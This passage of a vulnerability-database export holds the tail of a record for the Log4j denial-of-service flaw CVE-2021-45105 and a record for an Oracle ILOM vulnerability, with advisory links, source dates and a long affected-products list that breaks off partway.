"https://access.redhat.com/security/cve/cve-2021-45046", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2021-44832", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2021-45046", }, { trust: 0.2, url: "https://access.redhat.com/articles/11258", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23307", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23302", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23305", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2021-4104", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-23302", }, { trust: 0.2, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-23305", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-23307", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2021-4104", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches&product=appplatform&version=7.4", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:0216", }, { trust: 0.1, url: "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009", }, { trust: 0.1, url: "https://access.redhat.com/solutions/6577421", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1297", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1296", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_single_sign-on/7.5/html/release_notes/index", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1469", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso&downloadtype=patches&version=7.5", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.20.04.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.04.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.12.4-0ubuntu0.1", }, { trust: 0.1, url: "https://ubuntu.com/security/notices/usn-5222-1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.10.1", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhba-2022:0025", }, { trust: 0.1, url: "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html", }, { trust: 0.1, url: "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-40346", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-39241", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:0026", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2021-39241", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2021-40346", }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-12-19T00:00:00", db: "ZDI", id: "ZDI-21-1541", }, { date: "2021-12-18T00:00:00", db: "VULHUB", id: "VHN-408743", }, { date: "2021-12-18T00:00:00", db: "VULMON", id: "CVE-2021-45105", }, { date: "2022-01-20T17:49:52", db: "PACKETSTORM", id: "165636", }, { date: "2022-04-11T17:14:49", db: "PACKETSTORM", id: "166676", }, { date: "2022-04-11T17:15:55", db: "PACKETSTORM", id: "166677", }, { date: "2022-04-21T15:09:01", db: "PACKETSTORM", id: "166798", }, { date: "2022-01-12T15:36:56", db: "PACKETSTORM", id: "165516", }, { date: "2022-01-13T16:32:51", db: "PACKETSTORM", id: "165552", }, { date: "2021-12-18T12:15:07.433000", db: "NVD", id: "CVE-2021-45105", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-12-19T00:00:00", db: "ZDI", id: "ZDI-21-1541", }, { date: "2022-10-06T00:00:00", db: "VULHUB", id: "VHN-408743", }, { date: "2022-10-06T00:00:00", db: "VULMON", id: "CVE-2021-45105", }, { date: "2024-11-21T06:31:58.170000", db: "NVD", id: "CVE-2021-45105", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "165516", }, ], trust: 0.3, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j StrSubstitutor Uncontrolled Recursion Denial-of-Service Vulnerability", sources: [ { db: "ZDI", id: "ZDI-21-1541", }, ], trust: 0.7, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "code execution", sources: [ { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "165516", }, ], trust: 0.2, }, }
var-201607-0654
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Backup-Restore' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0654", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance 